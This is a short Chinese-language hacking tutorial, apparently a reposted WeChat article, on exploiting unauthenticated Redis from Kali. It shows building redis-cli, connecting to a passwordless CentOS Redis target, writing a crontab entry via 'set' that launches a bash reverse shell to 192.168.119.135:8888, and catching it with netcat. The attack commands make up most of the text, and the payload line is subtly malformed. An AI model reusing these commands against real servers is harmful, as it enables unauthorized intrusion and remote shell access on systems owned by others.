书接上篇,我们这里需要在kali中安装redis,这样我们才可以通过对方的未授权漏洞,进行一个远程的链接。
“ 新手走好每一步,就是前进的方向,追逐自己的梦吧。”
这里我们需要在kali中搭建,然后我们需要用kali中的redis来远程链接目标的redis
wget http://download.redis.io/redis-stable.tar.gz这里步骤差不多,下载之后解压
tar -zxvf 文件名然后我们到目录下进行make命令执行
然后根据提示我们安装test库
make testcp src/redis-cli /usr/bin所以我们这里可以使用命令链接上没有密码的centos上的redis,
redis-cli -h 目标IP然后我们连接上对方的redis之后我们可以设置计划任务反弹shell
ubuntu不可以,centos可以。
先访问服务器。然后我们设置计划任务
set haha "\n\n* * * * * bash -i >& /dev/tcp/192.168.119.135/8888 0>&\n\n"我们在黑客机器就可以打开nc接收反弹。
nc -lvp 8888科学上网点这里
工具集合点这里
实战文章点这里
QQ查I P点这里
扫描二维码关注我们吧!
文章来源: http://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247486536&idx=1&sn=f21f7f8e22cfcab5e9e705c967070cfe&chksm=fdb4db13cac352058bd8e0ce0f8168fdc9b3a1afa83f89819a47b94a54830db2bcae6d10d502#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh